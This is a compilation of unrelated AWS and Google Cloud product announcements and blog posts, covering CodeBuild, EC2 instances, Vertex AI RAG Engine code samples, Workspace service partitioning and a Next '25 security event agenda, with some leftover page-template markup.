AWS CodeBuild has expanded its batch build capabilities to include support for reserved capacity fleets and Lambda compute. This enhancement allows you to select a mix of on-demand instances, reserved capacity fleets, or Lambda compute resources for your build batches. AWS CodeBuild is a fully managed continuous integration service that compiles source code, runs tests, and produces software packages ready for deployment.
Batch builds in CodeBuild enable the simultaneous execution of multiple, coordinated builds within a project. This feature is particularly beneficial for developers working on multi-platform projects or those with interdependent build processes. You can define the build sequence using various methods, such as a build list, a build matrix, or a dependency graph of build definitions. CodeBuild then manages the orchestration of these builds, streamlining the overall development and integration process.
The new compute options are now available in US East (N. Virginia), US East (Ohio), US West (Oregon), South America (Sao Paulo), Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Mumbai), Europe (Ireland), and Europe (Frankfurt). For more information about the AWS Regions where CodeBuild is available, see the AWS Regions page.
To learn more about running batch builds in CodeBuild, please visit our documentation. To learn more about how to get started with CodeBuild, visit the AWS CodeBuild product page.
Today, AWS End User Messaging launched self-service Sender ID registrations for 19 additional countries, helping developers correctly configure SMS messaging for their applications. The new countries include Australia, Belarus, Egypt, India, Indonesia, Jordan, Kenya, Kuwait, Kazakhstan, Philippines, Qatar, Russia, Saudi Arabia, Singapore, Sri Lanka, Thailand, Turkey, United Arab Emirates, Vietnam, and Zambia.
Phone numbers and sender IDs act as an extension of a business’s brand, and mobile carriers and governments worldwide have implemented SMS registrations as a form of “know your customer” check to protect end-users from unwanted and spam messages. By registering, application developers ensure a higher level of deliverability and ensure their use-cases comply with local rules and regulations, avoiding message filtering.
Previously, customers needed to open a support case to request these sender IDs, but now they can self-service via the AWS Management Console or programmatically via the APIs, saving time-to-onboard. The registration support is available in all commercial regions where AWS End User Messaging is generally available.
If you have a website, it’s table stakes to build engaging experiences that are effective at retaining existing customers, and attracting new ones. Users want tailored content, but traditional website development tools struggle to keep up with the demand for dynamic, individualized journeys. With Google Gemini and Conversational Agents (Dialogflow CX), you can now build websites that dynamically adapt their content based on what your users are looking for.
In this blog post, you will learn how to:
Create dynamic web pages that respond to user’s intents using Conversational Agents
Use function tools to bridge the gap between conversation intent and web content display
What is a Conversational Agents function tool?
A Conversational Agent function tool is a feature that allows your chatbot to interact with external systems and trigger actions based on user conversations. In this article, we use it to:
Detect user intents from natural language input
Map those intents to specific function tool
Dynamically update the UI based on the conversation flow
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec89f16f610>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Let’s take an example: Retail chatbot
While everyone can benefit from these features, retailers in particular can benefit from building dynamic web pages with Conversational Agents. We’ll use a retail chatbot use case to demonstrate this tool. Here’s the workflow:
Step 1: Create a function tool
Set up a new Playbook function tool called Load-Swag-Content with the following input/output schemas in YAML format.
code_block
<ListValue: [StructValue([(‘code’, ‘# Input formatrnproperties:rn url:rn type: stringrn description: the URL for the Swagrnrequired:rn – urlrntype: objectrnrn# Output formatrnnull’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec89cf41340>)])]>
Your console should look something like this:
Step 2: Set up a playbook steering agent
Set up a main steering playbook to call the function tool Load-Swag-Content.
Step 3: Create examples to drive Playbook agent behavior.
In this example, when a user asks about “Backpack”, the Playbook agent will call the function tool by passing a backpack related URL as an argument to the web client.
More information on the web client in the next step.
Step 4: Write web client JavaScript function
This client-side Javascript function receives the URL from the Load-Swag-Content function tool and updates the HTML iframe accordingly.
We are using HTML iframe to demonstrate the function calling and parameter passing capabilities. The same concept works across different web frameworks and applications, and developers can be as creative as they want to build custom logic.
Step 5: Register the function tool
Register the Playbook function tool using registerClientSideFunction, which will map the Load-Swag-Content tool with the JavaScript function loadURL.
This is a front end sample code. You need to update configuration such as YOUR_REGION, YOUR_PROJECT_ID, YOUR_AGENT_ID, YOUR_TOOL_ID, and custom JavaScript function.
Let’s look at a demo use case for a virtual swag assistant. The customer is greeted at the start of the chat.
When the customer wants to find out more about a Fleece Jacket, the page is dynamically updated to display relevant information.
Next steps
To learn more about Conversational Agent Function tools, check out the following resources and enhance your customer experience with real-time intent-based dynamic web pages.
Get started with Conversational Agent by following the tutorial here
AWS Marketplace launched email notification and Amazon EventBridge event that informs AWS Marketplace selling partners, including ISVs and Channel Partners, when their disbursements have been paused due to invalid bank account information. With this launch, selling partners can be alerted to these events and take immediate action to update their banking details so they receive their disbursements promptly.
Until now, AWS Marketplace selling partners had to check disbursement status in Insights tab in AMMP. With this release, disbursement paused events that are caused by invalid bank accounts will be sent to Amazon EventBridge and AWS Marketplace sellers can subscribe to these events by defining appropriate rule patterns. Each event will contain a failure reason, payment instrument ARN that is invalid, and a link to the remediation steps. The source for these EventBridge events is aws.marketplace and the possible detail-type value is Disbursement Paused.
AWS Compute Optimizer now expands idle and rightsizing recommendations to Amazon EC2 Auto Scaling groups with scaling policies and multiple instance types. With the new recommendations, you can take actions to optimize cost and performance of these groups without requiring specialized knowledge or engineering resources to analyze them.
Compute Optimizer analyzes EC2 Auto Scaling groups’ scaling policies, instance configurations, and utilization metrics to understand their usage patterns and identify opportunities for cost and performance optimization. For EC2 Auto Scaling groups using multiple instance types, Compute Optimizer helps identify the most cost-efficient instance types, enabling you to prioritize them in your groups. When EC2 Auto Scaling groups use scaling policies to scale based on CPU utilization, Compute Optimizer recommends optimizing the CPU-to-memory ratio by considering only instance types with identical vCPU counts. Compute Optimizer also identifies and flags EC2 Auto Scaling groups that demonstrate consistently low CPU and network usage throughout the lookback period as idle, recommending that you scale them down to save costs.
This new feature is available in all AWS Regions where AWS Compute Optimizer is available, except the AWS GovCloud (US) and AWS China Regions. To learn more about the new feature updates, please visit Compute Optimizer’s product page and user guide.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C8g instances are available in AWS Europe (Ireland) and AWS Europe (Spain) regions. These instances are powered by AWS Graviton4 processors and deliver up to 30% better performance compared to AWS Graviton3-based instances. Amazon EC2 C8g instances are built for general-purpose workloads, such as application servers, microservices, gaming servers, midsize data stores, and caching fleets. These instances are built on the AWS Nitro System, which offloads CPU virtualization, storage, and networking functions to dedicated hardware and software to enhance the performance and security of your workloads.
AWS Graviton4-based Amazon EC2 instances deliver the best performance and energy efficiency for a broad range of workloads running on Amazon EC2. These instances offer larger instance sizes with up to 3x more vCPUs and memory compared to Graviton3-based Amazon C7g instances. AWS Graviton4 processors are up to 40% faster for databases, 30% faster for web applications, and 45% faster for large Java applications than AWS Graviton3 processors. C8g instances are available in 12 different instance sizes, including two bare metal sizes. They offer up to 50 Gbps enhanced networking bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS).
Closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI for enterprise. Despite the incredible capabilities of generative AI for enterprise, this perceived gap may be a barrier for many developers and enterprises to “productionize” AI. This is where retrieval-augmented generation (RAG) becomes non-negotiable – it strengthens your enterprise applications by building trust in its AI outputs.
Today, we’re sharing the general availability of Vertex AI’s RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your data and methods. With our Vertex AI RAG Engine you will be able to:
Adapt to any architecture: Choose the models, vector databases, and data sources that work best for your use case. This flexibility ensures RAG Engine fits into your existing infrastructure rather than forcing you to adapt to it.
Evolve with your use case: Add new data sources, updating models, or adjusting retrieval parameters happens through simple configuration changes. The system grows with you, maintaining consistency while accommodating new requirements.
Evaluate in simple steps: Set up multiple RAG engines with different configurations to find what works best for your use case.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef9c26ed30>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Introducing Vertex AI RAG Engine
Vertex AI RAG Engine is a managed service that lets you build and deploy RAG implementations with your data and methods. Think of it as having a team of experts who have already solved complex infrastructure challenges such as efficient vector storage, intelligent chunking, optimal retrieval strategies, and precise augmentation — all while giving you the controls to customize for your specific use case.
Vertex AI’s RAG Engine offers a vibrant ecosystem with a range of options catering to diverse needs.
DIY capabilities: DIY RAG empowers users to tailor their solutions by mixing and matching different components. It works great for low to medium complexity use cases with easy-to-get-started API, enabling fast experimentation, proof-of-concept and RAG-based application with a few clicks.
Search functionality: Vertex AI Search stands out as a robust, fully managed solution. It supports a wide variety of use cases, from simple to complex, with high out-of-the-box quality, easiness to get started and minimum maintenance.
Connectors: A rapidly growing list of connectors helps you quickly connect to various data sources, including Cloud Storage, Google Drive, Jira, Slack, or local files. RAG Engine handles the ingestion process (even for multiple sources) through an intuitive interface.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, that can streamline your data ingestion process.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
Customization
One of the defining strengths of Vertex AI’s RAG Engine is its capacity for customization. This flexibility allows you to fine-tune various components to perfectly align with your data and use case.
Parsing: When documents are ingested into an index, they are split into chunks. RAG Engine provides the possibility to tune chunk size and chunk overlap and different strategies to support different types of documents.
Retrieval: you might already be using Pinecone, or perhaps you prefer the open-source capabilities of Weaviate. Maybe you want to leverage Vertex AI Vector Search or our Vector database. RAG Engine works with your choice, or if you prefer, can manage the vector storage entirely for you. This flexibility ensures you’re never locked into a single approach as your needs evolve.
Generation: You can choose from hundreds of LLMs in Vertex AI Model Garden, including Google’s Gemini, Llama and Claude.
Use Vertex AI RAG as a tool in Gemini
Vertex AI’s RAG Engine is natively integrated with Gemini API as a tool. You can create grounded conversation that uses RAG to provide contextually relevant answers. Simply initialize a RAG retrieval tool, configured with specific settings like the number of documents to retrieve and using an LLM-based ranker. This tool is then passed to a Gemini model.
code_block
<ListValue: [StructValue([(‘code’, ‘from vertexai.preview import ragrnfrom vertexai.preview.generative_models import GenerativeModel, Toolrnimport vertexairnrnPROJECT_ID = “PROJECT_ID”rnCORPUS_NAME = “projects/{PROJECT_ID}/locations/LOCATION/ragCorpora/RAG_CORPUS_RESOURCE”rnMODEL_NAME= “MODEL_NAME”rnrn# Initialize Vertex AI API once per sessionrnvertexai.init(project=PROJECT_ID, location=”LOCATION”)rnrnconfig = vertexai.preview.rag.RagRetrievalConfig(rn top_k=10,rn ranking=rag.Ranking(rn llm_ranker=rag.LlmRanker(rn model_name=MODEL_NAMErn )rn )rn)rnrnrag_retrieval_tool = Tool.from_retrieval(rn retrieval=rag.Retrieval(rn source=rag.VertexRagStore(rn rag_resources=[rn rag.RagResource(rn rag_corpus=CORPUS_NAME,rn )rn ],rn rag_retrieval_config=configrn ),rn )rn)rnrnrag_model = GenerativeModel(rn model_name=MODEL_NAME, tools=[rag_retrieval_tool]rn)rnresponse = rag_model.generate_content(“Why is the sky blue?”)rnprint(response.text)rn# Example response:rn# The sky appears blue due to a phenomenon called Rayleigh scattering.rn# Sunlight, which contains all colors of the rainbow, is scatteredrn# by the tiny particles in the Earth’s atmosphere….rn# …’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eef9c26ed00>)])]>
Use Vertex AI Search as a retriever:
Vertex AI Search provides a solution for retrieving and managing data within your Vertex AI RAG applications. By using Vertex AI Search as your retrieval backend, you can improve performance, scalability, and ease of integration.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, that can streamline your data ingestion process.
Seamless integration: Vertex AI provides built-in integration with Vertex AI Search, which lets you select Vertex AI Search as the corpus backend for your RAG application. This simplifies the integration process and helps to ensure optimal compatibility between components.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
code_block
<ListValue: [StructValue([(‘code’, ‘from vertexai.preview import ragrnimport vertexairnrnPROJECT_ID = “PROJECT_ID”rnDISPLAY_NAME = “DISPLAY_NAME”rnENGINE_NAME = “ENGINE_NAME”rnrn# Initialize Vertex AI API once per sessionrnvertexai.init(project=PROJECT_ID, location=”us-central1″)rnrn# Create a corpusrnvertex_ai_search_config = rag.VertexAiSearchConfig(rn serving_config=f”{ENGINE_NAME}/servingConfigs/default_search”,rn)rnrnrag_corpus = rag.create_corpus(rn display_name=DISPLAY_NAME,rn vertex_ai_search_config=vertex_ai_search_config,rn)rnrn# Check the corpus just createdrnnew_corpus = rag.get_corpus(name=rag_corpus.name)rnprint(new_corpus)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eef9cad9ac0>)])]>
Cloud applications like Google Workspace provide benefits such as collaboration, availability, security, and cost-efficiency. However, for cloud application developers, there’s a fundamental conflict between achieving high availability and the constant evolution of cloud applications. Changes to the application, such as new code, configuration updates, or infrastructure rearrangements, can introduce bugs and lead to outages. These risks pose a challenge for developers, who must balance stability and innovation while minimizing disruption to users.
Here on the Google Workspace Site Reliability Engineering team, we once moved a replica of Google Docs to a new data center because we needed extra capacity. But moving the associated data, which was vast, overloaded a key index in our database, restricting user ability to create new docs. Thankfully, we were able to identify the root cause and mitigate the problem quickly. Still, this experience convinced us of the need to reduce the risk of a global outage from a simple application change.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef945c6ac0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Limit the blast radius
Our approach to reducing the risk of global outages is to limit the “blast radius,” or extent, of an outage by vertically partitioning the serving stack. The basic idea is to run isolated instances (“partitions”) of application servers and storage (Figure 1). Each partition contains all the various servers necessary to service a user request from end to end. Each production partition also has a pseudo-random mix of users and workloads, so all the partitions have similar resource needs. When it comes time to make changes to the application code, we deploy new changes to one partition at a time. Bad changes may cause a partition-wide outage, but we are protected from a global application outage.
Compare this approach to using canarying alone, in which new features or code changes are released to a small group of users before rolling them out to the rest. While canarying deploys changes first to just a few servers, it doesn’t prevent problems from spreading. For example, we’ve had incidents where canaried changes corrupted data used by all the servers in the deployment. With partitioning, the effects of bad changes are isolated to a single partition, preventing such contagion. Of course, in practice, we combine both techniques: canarying new changes to a few servers within a single partition.
Benefits of partitioning
Broadly speaking, partitioning brings a lot of advantages:
Availability: Initially, the primary motivation for partitioning was to improve the availability of our services and avoid global outages. In a global outage, an entire service may be down (e.g., users cannot log into Gmail), or a critical user journey (e.g., users cannot create Calendar events) — obviously things to be avoided.
Still, the reliability benefits of partitioning can be hard to quantify; global outages are relatively infrequent, so if you don’t have one for a while, it may be due to partitioning, or may be due to luck. That said, we’ve had several outages that were confined to a single partition, and believe they would have expanded into global outages without it.
Flexibility: We evaluate many changes to our systems by experimenting with data. Many user-facing experiments, such as a change to a UI element, use discrete groups of users. For example, in Gmail we can choose an on-disk layout that stores the message bodies of emails inline with the message metadata, or a layout that separates them into different disk files. The right decision depends on subtle aspects of the workload. For example, separating message metadata and bodies may reduce latency for some user interactions, but requires more compute resources in our backend servers to perform joins between the body and metadata columns. With partitioning, we can easily evaluate the impact of these choices in contained, isolated environments.
Data location: Google Workspace lets enterprise customers specify that their data be stored in a specific jurisdiction. In our previous, non-partitioned architecture, such guarantees were difficult to provide, especially since services were designed to be globally replicated to reduce latency and take advantage of available capacity.
Challenges
Despite the benefits, there are some challenges to adopt partitioning. In some cases, these challenges make it hard or risky to move from a non-partitioned to a partitioned setup. In other cases, challenges persist even after partitioning. Here are the issues as we see them:
Not all data models are easy to partition: For example, Google Chat needs to assign both users and chat rooms to partitions. Ideally, a chat and its members would be in a single partition to avoid cross-partition traffic. However, in practice, this is difficult to accomplish. Chat rooms and users form a graph, with users in many chat rooms and chat rooms containing many users. In the worst case, this graph may have only a single connected component — the user. If we were to slice the graph into partitions, we could not guarantee that all users would be in the same partition as their chat rooms.
Partitioning a live service requires care: Most of our services pre-date partitioning. As a result, adopting partitioning means taking a live service and changing its routing and storage setup. Even if the end goal is higher reliability, making these kinds of changes in a live system is often the source of outages, and can be risky.
Partition misalignment between services: Our services often communicate with each other. For example, if a new person is added to a Calendar event, Calendar servers make an Remote Procedure Call (RPC) to Gmail delivery servers to send the new invitee an email notification. Similarly, Calendar events with video call links require Calendar to talk to Meet servers for a meeting id. Ideally, we would get the benefits of partitioning even across services. However, aligning partitions between services is difficult. The main reason is that different services tend to use different entity types when determining which partition to use. For example, Calendar partitions on the owner of the calendar while Meet partitions on meeting id. The result is that there is no clear mapping from partitions in one service to another.
Partitions are smaller than the service: A modern cloud application is served by hundreds or thousands of servers. We run servers at less than full utilization so that we can tolerate spikes in traffic, and because servers that are saturated with traffic generally perform poorly. If we have 500 servers, and target each at 60% CPU utilization, we effectively have 200 spare servers to absorb load spikes. Because we do not fail over between partitions, each partition has access to a much smaller amount of spare capacity. In a non-partitioned setup, a few server crashes may likely go unnoticed, since there is enough headroom to absorb the lost capacity. But in a smaller partition, these crashes may account for a non-trivial portion of the available server capacity, and the remaining servers may become overloaded.
Key takeaways
We can improve the availability of web applications by partitioning their serving stacks. These partitions are isolated, because we do not fail over between them. Users and entities are assigned to partitions in a sticky manner to allow us to roll out changes in order of risk tolerance. This approach allows us to roll out changes one partition at a time with confidence that bad changes will only affect a single partition, and ideally that partition contains only users from your organization.
In short, partitioning supports our efforts to provide stronger and more reliable services to our users, and it might apply to your service as well. For example, you can improve the availability of your application by using Spanner, which provides geo-partitioning out of the box. Read more about geo-partitioning best practiceshere.
Few things are more critical to IT operations than security. Security incidents, coordinated threat actors, and regulatory mandates are coupled with the imperative to effectively manage risk and the vital business task of rolling out generative AI. That’s why in 2025 at Google Cloud Next we are creating an in-depth security experience to show you all the ways that you can make Google part of your security team and advance your innovation agenda with confidence.
Let’s see why Google Cloud Next is shaping up to be a must-attend event for security experts and the security-curious alike.
What’s in store for you
Here are some of the opportunities you’ll have to interact with Google’s security experts and security technology:
Our massive Security Lounge, a dedicated area of the expo where you can meet the security leaders engineering Google Cloud’s secure by design platform and products, and experience product demos spanning Google Cloud’s security portfolio. Get all your burning product questions answered and provide direct input to the teams who build them.
An interactive Security Operations Center to experience the power of Google Security Operations from the eyes of both defender and adversary. See first-hand how Google equips cybersecurity teams with the data, AI, and scalable analytics to detect and remediate today’s most sophisticated attacks.
At the Mandiant Threat Space, you’ll be able to hear and learn directly from frontline defenders and incident responders who battle advanced threats and defend critical infrastructure around the world.
The Securing AI experience demonstrates how Google Cloud products and expertise can help you manage AI risk, from creation to consumption: inventory your AI assets, safeguard your AI systems, and respond to threats.
Our Capture the Flag challenge, where you can test and hone your cybersecurity skills. This exercisewill use real-world data, including Cybersecurity and Infrastructure Security Agency (CISA) advisories, ransom notes, and information from the dark web, to simulate a real-world threat hunt. Navigate clues, analyze evidence, and solve puzzles to capture the flags and best the competition.
Security tabletop exercises where participants role-play and analyze aspects of a hypothetical but realistic cybersecurity incident, such as a data breach or ransomware attack. Gain insight into how your organization is likely to perform during incidents before they happen and learn best practices for handling these incredibly challenging situations that you can take back to your organization.
Birds of a Feather sessions for insightful discussions on key cloud security topics. These are unique opportunities to connect with peers, share your cybersecurity expertise and solve problems with the help of the Google Cloud Security community.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef9afcca00>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Security breakout sessions
If you’ve attended Next in the past, you know that breakouts are also core to our program. We’ll have more than 40 security breakout sessions covering today’s pressing security topics including cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Here’s a sneak peek at some of the key breakout sessions on the agenda:
Securing your AI deployments, from creation to consumption: Learn how to build secure AI systems from the ground up and protect your AI models from attacks.
Route, reduce, redact: Managing your security data pipeline:Dive into the new data pipeline management capabilities of Google SecOps and learn how to transform security data to manage scale, reduce costs, and satisfy compliance mandates.
Got identity? Learn to love IAM: Master Identity and Access Management (IAM) to control access to your cloud resources and prevent unauthorized access.
Stop data exfiltration with cloud-first security controls: Discover how to prevent sensitive data from leaving your organization’s control.
Unlocking OT security: Threat intelligence for critical industries: Learn how advanced threat intelligence enables organizations to move from reactive to proactive defense strategies.
AI security and APIs: Addressing the OWASP top 10 LLM and API risks: Understand the top security risks for large language models (LLMs) and APIs, and learn how to mitigate them.
Strengthen cloud security posture, detect threats, and mitigate risks with Security Command Center: Use Google Cloud’s Security Command Center to gain comprehensive visibility into your security posture and respond to threats effectively.
Best practices for SIEM migration and ditching dinosaurs: In this panel, experts will share insights and best practices from their own SIEM migration journeys.
Keep AI secrets safe with Confidential Computing: Explore confidential computing techniques to protect your sensitive data and AI models in use.
Protect Internet-facing web, API, and gen AI services from attacks: Secure your web applications, APIs, and generative AI services from a wide range of threats.
There’s no place like Chrome for advanced data protection and threat intelligence: Learn how Chrome’s security features can protect your users and your organization from cyberattacks.
Dedicated security executive program
Our CISO Connect for Leaders is dedicated programming designed to equip CISOs and other security leaders with insights and strategies they need to navigate the evolving threat landscape and build a security-first culture. If you would like to be considered for participation in this executive program at Next ‘25, contact your Google Cloud account representative.
Don’t miss out
Next ‘25 is the ideal opportunity for everyone in your organization to learn about how Google Cloud can help keep them safe as they move forward in the AI era. You can also earn continuing professional education credits for your certifications.
Next ’25 will take place at the Mandalay Bay Convention Center in Las Vegas, April 9 to 11, 2025. Early bird pricing is available for $999 — but space is limited, so register soon.
Elevate your security game at Next ’25. Register today, and stay tuned for more updates and information on our security programming.
Retailers have always moved quickly to connect and match the latest merchandise with customers’ needs. And the same way they carefully design every inch of their stores, the time and thought that goes into their IT infrastructure is now just as important in the era of omnichannel shopping.
As retail organizations increasingly adopt AI foundation models and other AI technologies to improve the shopping journey, robust infrastructure becomes paramount. Retailers need to be able to develop AI applications and services quickly, reliably, robustly, and affordably, and with support from Google Cloud and NVIDIA, leading companies are already accelerating their time to market and achieving scalable costs as they move AI from pilots into production.
Google Cloud has worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents; we’ve also integrated prebuilt generative AI agents for customer service to drive immediate savings. With the NVIDIA AI Enterprise software platform available on the Google Cloud Marketplace, retailers can streamline AI development and deployment through scalable NVIDIA infrastructure running on Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec644279490>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
And now, retailers can also leverage NVIDIA NIM microservices, part of NVIDIA AI Enterprise and available on Google Kubernetes Engine (GKE) to deploy generative AI models at scale, optimize inference and handle large volumes of inquiries at reduced costs.
Retail customers and partners are combining Google Cloud with NVIDIA AI Enterprise to unlock AI transformation at scale.
Reduce Costs and Enhance Customer Satisfaction: LiveX AI stands at the cutting edge of generative AI technology, building custom, multimodal AI agents that can deliver truly human-like customer experiences. Google Cloud and LiveX AI collaborated to help jumpstart LiveX AI’s development, using Google Kubernetes Engine (GKE) and NVIDIA AI Enterprise. In a matter of three weeks, LiveX AI and Google Cloud worked together to deliver a custom solution for its client, resulting in a reduction in customer support costs by up to 85%.
“NVIDIA’s software on Google Cloud brings two of the best technology leaders together. NVIDIA’s easy-to-use NIM microservices, available on Google Cloud, are secure and reliable, and help deploy high-performance AI model inference more quickly and affordably. NVIDIA NIM microservices and GPUs on GKE accelerated LiveX AI Agent’s average answer/response generation speed by 6.1x, enabling real-time, human-like interactions for customer support, shopping assistance, and product education, boosting growth, retention and customer experience.” – Jia Li, Co-Founder, Chief AI Officer, LiveX AI
Improve responsiveness:AI techniques like text embedding and vector database help retailers make more relevant recommendations by using more data, but this can also slow the experience down. The in-house engineering and data science organization at a top-5 U.S. grocer collaborated with Google and NVIDIA to optimize models for better performance.
By using NVIDIA AI Enterprise software’s performance and caching improvements in its Vertex AI endpoint, the grocer cut inference time from several seconds to just 100 milliseconds — without changing the model. This now makes large-scale, real-time personalization possible. Learn more about the benefits of combining Google Cloud Vertex AI Platform andNVIDIA AI Enteprise software.
In-store analytics & innovation: AI is advancing how brick and mortar stores understand customer engagement, creating new opportunities to personalize the shopper journey. Standard.ai is accelerated by NVIDIA Metropolis, also available with NVIDIA AI Enterprise on the Google Cloud Marketplace, giving retailers and consumer goods precise visualization of customer journeys and creating actionable insights by real time analyzing factors such as dwell time, shopper orientation, proximity, and engagement with products, ads, and high-impact zones.
“The NVIDIA Metropolis platform and DeepStream software development kit have enabled us to seamlessly deploy our video pipelines across Google Cloud data centers and on-prem GPUs, and, in combination with model optimizations through the NVIDIA TensorRT ecosystem of application programming interfaces, we have cut our image preprocessing time to one-third, significantly reducing our infrastructure footprint.” – David Woolard, Chief Technology Officer, Standard.ai
Accelerate AI transformation
Influenced by the rapid advancements of AI, the retail landscape is evolving faster than ever. For retailers looking to stay on the cutting edge, the collaboration between Google Cloud and NVIDIA continues to offer access to the latest in AI models, infrastructure, platforms that ensure scalability, and development tools all in an environment that’s built on responsible AI practices and best-in-class security.
Today, AWS announces the general availability of a new AWS Local Zone in New York City, supporting a wide range of workloads at the edge. This new Local Zone offers Amazon Elastic Compute Cloud (Amazon EC2) C7i, R7i, M6i, and M6in instances and Amazon Elastic Block Store (Amazon EBS) volume types gp2, gp3, io1, sc1, and st1. You can also access Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (Amazon EKS), Application Load Balancer, AWS Direct Connect, and the microsecond-accurate time of Amazon Time Sync in this new Local Zone to support your workloads at the edge.
Local Zones are an AWS infrastructure deployment that place compute, storage, database, and other select services closer to large population, industry, and IT centers where no AWS Region exists. You can use Local Zones to run applications that require single-digit millisecond latency for use cases such as real-time gaming, hybrid migrations, media and entertainment content creation, live video streaming, engineering simulations, financial services payment processing, capital market operations, and AR/VR.
Local Zones are available in the US in 17 metro areas and globally in an additional 17 metro areas, allowing you to deliver low-latency applications to end users worldwide. For more information about where other Local Zones are available, visit Local Zones locations.
You can enable the new Local Zone in New York City from the Zones tab in the Amazon EC2 console settings or the ModifyAvailabilityZoneGroup API. Check out Local Zones pricing for information on Amazon EC2 instances available as On-Demand Instances, Spot Instances, or part of Savings Plans in the new Local Zone in New York City. To learn more, visit Local Zones.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C7i instances powered by custom 4th Gen Intel Xeon Scalable processors (code-named Sapphire Rapids) are available in the AWS GovCloud (US-West)Region. These custom processors, available only on AWS, offer up to 15% better performance over comparable x86-based Intel processors utilized by other cloud providers.
C7i instances deliver up to 15% better price-performance versus C6i instances and are a great choice for all compute-intensive workloads, such as batch processing, distributed analytics, ad-serving, and video encoding. C7i instances offer larger instance sizes, up to 48xlarge, and two bare metal sizes (metal-24xl, metal-48xl). These bare-metal sizes support built-in Intel accelerators: Data Streaming Accelerator, In-Memory Analytics Accelerator, and QuickAssist Technology that are used to facilitate efficient offload and acceleration of data operations and optimize performance for workloads.
C7i instances also support new Intel Advanced Matrix Extensions (AMX) that accelerate matrix multiplication operations for applications such as CPU-based ML. Customers can attach up to 128 EBS volumes to a C7i instance vs. up to 28 EBS volumes to a C6i instance. This allows processing of larger amounts of data, scale workloads, and improved performance over C6i instances. To learn more, visit the EC2 C7i instances Page.
Amazon Connect Contact Lens now provides free trials for first-time users of conversational analytics and performance evaluations. New conversational analytics for voice customers will receive a free trial with no charge for the first 100,000 voice minutes per month for the first two months. In addition, customers using Contact Lens performance evaluations for the first time will receive a 30-day free trial, that begins the day that they submit their first performance evaluation. The free trials will enable first-time customers to pilot Contact Lens conversational analytics and evaluations in their environment without incurring additional costs.
With this launch, the new Contact Lens free trial are available in all AWS regions supported by Contact Lens. To learn more, please visit our documentation and our webpage. For information about Contact Lens pricing, please visit our pricing page.
Amazon Managed Streaming for Apache Kafka Connect (Amazon MSK Connect) APIs now come with AWS PrivateLink support, allowing you to invoke Amazon MSK Connect APIs from within your Amazon Virtual Private Cloud (VPC) without traversing the public internet.
By default, all communication between your MSK Clusters and your Amazon MSK Connect connectors is private, and your data never traverses the internet. Similar to AWS PrivateLink support for Amazon MSK APIs, this launch enables clients to invoke MSK Connect APIs via a private endpoint. This allows client applications with strict security requirements to perform MSK Connect specific actions such as creating connectors from new or existing custom plugins, listing and describing connector details, or updating connectors, without the need to communicate over a public connection.
AWS PrivateLink support for Amazon MSK Connect is available in all AWS Regions where Amazon MSK Connect is available. To get started, follow the directions provided in the AWS PrivateLink documentation. To learn more about Amazon MSK Connect, visit the Amazon MSK Connect documentation.
Today, AWS announced the opening of a new AWS Direct Connect location within the Telehouse Bangkok, Thailand data center. By connecting your network to AWS at the new Bangkok location, you gain private, direct access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones. This site is the second AWS Direct Connect location within Thailand. The new Direct Connect location offers dedicated 10 Gbps and 100 Gbps connections with MACsec encryption available.
AWS also announced the addition of 10Gbps and 100Gbps MACsec services in the existing TCC, Bangkok Direct Connect location.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
